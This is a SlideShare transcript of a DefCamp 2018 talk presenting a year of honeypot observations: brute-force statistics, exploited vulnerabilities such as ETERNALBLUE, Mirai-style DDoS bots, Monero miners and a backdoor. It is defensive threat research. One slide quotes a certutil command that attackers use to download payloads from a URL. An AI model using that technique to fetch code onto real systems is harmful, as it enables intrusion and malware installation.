Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
MIRAI TO MONERO – ONE YEAR’S
WORTH OF HONEYPOT DATA
Adrian ...
2© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHO ARE WE?
• Senior security researchers
• Love exploits, ...
3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHO ARE WE?
4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
HONEY NETWORK
Honeypot distribution
5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHAT ARE ATTACKERS LIKE?
6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ATTACKERS ARE...
• Persistent
• Not very fashionable
• Reso...
7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
HONEY NETWORK
Distribution by targets
8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
• TELNET
• SSH
• SMTP
• POP3
• IMA...
9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
• Note: one “event” is per-hour ag...
10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
Unique IP Addresses
0
5000
10000
...
11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
Target Prevalence
Telnet-Brutefor...
12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT – BRUTE FORCE
Bruteforce Stats - October 2018
T...
13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PERSISTENT - CSI
• Not that many hits (aprox 6000)
• VMs, ...
14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NOT VERY FASHIONABLE
• CVE-2013-6117
Dahua DVRs
15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NOT VERY FASHIONABLE
• Yes, it's the WannaCry one...
ETERN...
16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NOT VERY FASHIONABLE
• It’s all fun and games
• Until you ...
17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
RESOURCEFUL
XAttacker
0
200
400
600
800
1000
1200
January-...
21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
OPPORTUNISTIC
Drupalgeddon[23]
22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ALL OF THESE
DLink – multiple vulnerabilities
23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ALL OF THESE
MySQL
24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Evolution of number of events
Mirai & Clon...
25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Evolution of number of events
Mirai & Clon...
26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Fortinet blogged: https://www.fortinet.com...
27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Antique bot, Windows, possibly modified
• ...
28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - DDOS
• Multiple documented families
• DDoSTF via ...
29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - COIN MINERS
• Seen via multiple exploits
• Monero...
30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - COIN MINERS
• Notice something strange?
certutil....
31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - COIN MINERS
• Technique described previously, not...
32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN - BACKDOORS
• Main source – ETERNALBLUE
• (allegedl...
33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRIVEN – BACKDOORS WITH A TWIST
• One sample URL downloade...
34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERV...
35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERV...
36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERV...
37© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
You’ve finished this document.
Download and read it offline.
Upcoming SlideShare
What to Upload to SlideShare
Next
Upcoming SlideShare
What to Upload to SlideShare
Next
Download to read offline and view in fullscreen.

Share

From Mirai to Monero – One Year’s Worth of Honeypot Data

Download to read offline

Adrian Hada and Mihai Vasilescu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9.

The slides and other presentations can be found on https://def.camp/archive

Related Books

Free with a 30 day trial from Scribd

See all
  • Be the first to like this

From Mirai to Monero – One Year’s Worth of Honeypot Data

  1. 1. 1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | MIRAI TO MONERO – ONE YEAR’S WORTH OF HONEYPOT DATA Adrian Hada, Senior Security Researcher Mihai Vasilescu, Senior Security Researcher
  2. 2. 2© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHO ARE WE? • Senior security researchers • Love exploits, malware, honeypots and tinkering • Good guys • Hope for unemployment because #securityissolved • @ht_adrian & @me_high4eva
  3. 3. 3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHO ARE WE?
  4. 4. 4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HONEY NETWORK Honeypot distribution
  5. 5. 5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHAT ARE ATTACKERS LIKE?
  6. 6. 6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACKERS ARE... • Persistent • Not very fashionable • Resourceful • Opportunistic • All the above • Driven
  7. 7. 7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HONEY NETWORK Distribution by targets
  8. 8. 8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE • TELNET • SSH • SMTP • POP3 • IMAP • VNC • HTTP • Wordpress • Joomla • PHPMyAdmin • And the list goes on Protocols
  9. 9. 9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE • Note: one “event” is per-hour aggregation Events 0 50000 100000 150000 200000 250000 January-18 February-18 March-18 April-18 May-18 June-18 July-18 August-18 September-18 Bucketed Brute Force Events
  10. 10. 10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE Unique IP Addresses 0 5000 10000 15000 20000 25000 30000 35000 40000 January-18 February-18 March-18 April-18 May-18 June-18 July-18 August-18 September-18 Unique IP Addresses
  11. 11. 11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE Target Prevalence Telnet-Bruteforce 53% SSH-Bruteforce 38% MySQL/MSSQL Bruteforce 7% SMTP Authentication Bruteforce 2% Generic PHP Application Login Bruteforce 0% RDP-Bruteforce 0% POP3 Bruteforce 0% VNC Bruteforce 0% XMLRPC sys.multicall Bruteforce Authentication 0% Top 10 Bruteforce Targets Telnet-Bruteforce SSH-Bruteforce MySQL/MSSQL Bruteforce SMTP Authentication Bruteforce Generic PHP Application Login Bruteforce RDP-Bruteforce POP3 Bruteforce VNC Bruteforce XMLRPC sys.multicall Bruteforce Authentication
  12. 12. 12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT – BRUTE FORCE Bruteforce Stats - October 2018 Telnet-Bruteforce SSH-Bruteforce MySQL/MSSQL Bruteforce VNC Bruteforce Generic PHP Application Login Bruteforce RDP-Bruteforce POP3 Bruteforce XMLRPC sys.multicall Bruteforce Authentication
  13. 13. 13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PERSISTENT - CSI • Not that many hits (aprox 6000) • VMs, not Cisco hardware Cisco Smart Install
  14. 14. 14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NOT VERY FASHIONABLE • CVE-2013-6117 Dahua DVRs
  15. 15. 15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NOT VERY FASHIONABLE • Yes, it's the WannaCry one... ETERNALBLUE
  16. 16. 16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NOT VERY FASHIONABLE • It’s all fun and games • Until you expose a DNS “open resolver” NTP & DNS
  17. 17. 17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker
  18. 18. 18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker
  19. 19. 19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker
  20. 20. 20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | RESOURCEFUL XAttacker 0 200 400 600 800 1000 1200 January-18 February-18 March-18 April-18 May-18 June-18 July-18 August-18 September-18 XAttacker Bucketed Hits
  21. 21. 21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | OPPORTUNISTIC Drupalgeddon[23]
  22. 22. 22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ALL OF THESE DLink – multiple vulnerabilities
  23. 23. 23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ALL OF THESE MySQL
  24. 24. 24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Evolution of number of events Mirai & Clones
  25. 25. 25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Evolution of number of events Mirai & Clones
  26. 26. 26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Fortinet blogged: https://www.fortinet.com/blog/threat-research/ddos-for-hire-service-powered-by- bushido-botnet-.html Mirai & Clones
  27. 27. 27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Antique bot, Windows, possibly modified • Seen via MySQL and ETERNALBLUE Nitol
  28. 28. 28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - DDOS • Multiple documented families • DDoSTF via MySQL (reported by MalwareMustDie in 2016) • DoFloo DDoS Trojan – validate using CC decryptor from https://github.com/felicitychou/RATConf- DecryptScript Other Bots
  29. 29. 29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - COIN MINERS • Seen via multiple exploits • Monero is the go-to currency • Reuse open mining tools • Example from ETERNALBLUE
  30. 30. 30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - COIN MINERS • Notice something strange? certutil.exe –urlcache –split –f <url>
  31. 31. 31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - COIN MINERS • Technique described previously, not new • Xavier Mertens’ ISC diary: https://isc.sans.edu/diary/rss/23517
  32. 32. 32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN - BACKDOORS • Main source – ETERNALBLUE • (allegedly) Chinese backdoor - https://artemonsecurity.blogspot.com/2012/12/zegost- analysis-of-chinese-backdoor.html • DLL file contains download URL for executable • Payload conf can be decrypted via RADconf-DecryptScript Zegost Trojan
  33. 33. 33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRIVEN – BACKDOORS WITH A TWIST • One sample URL downloaded 8.5M of data.. • Apparently, Themida-packed binary • Sandbox it! Zegost Trojan
  34. 34. 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | “IT’S 2019. THE INTERNET IS STILL A DANGEROUS PLACE. WHETHER WINDOWS OR LINUX. OR MAC.” Us,2018
  35. 35. 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
  36. 36. 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | “ATTACKERS ARE A LOT LIKE US. IF THEY CAN BREAK THINGS, WE CAN PROTECT THEM.” Us,2018
  37. 37. 37© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |

Adrian Hada and Mihai Vasilescu in Bucharest, Romania on November 8-9th 2018 at DefCamp #9. The slides and other presentations can be found on https://def.camp/archive

Views

Total views

258

On Slideshare

0

From embeds

0

Number of embeds

0

Actions

Downloads

4

Shares

0

Comments

0

Likes

0

×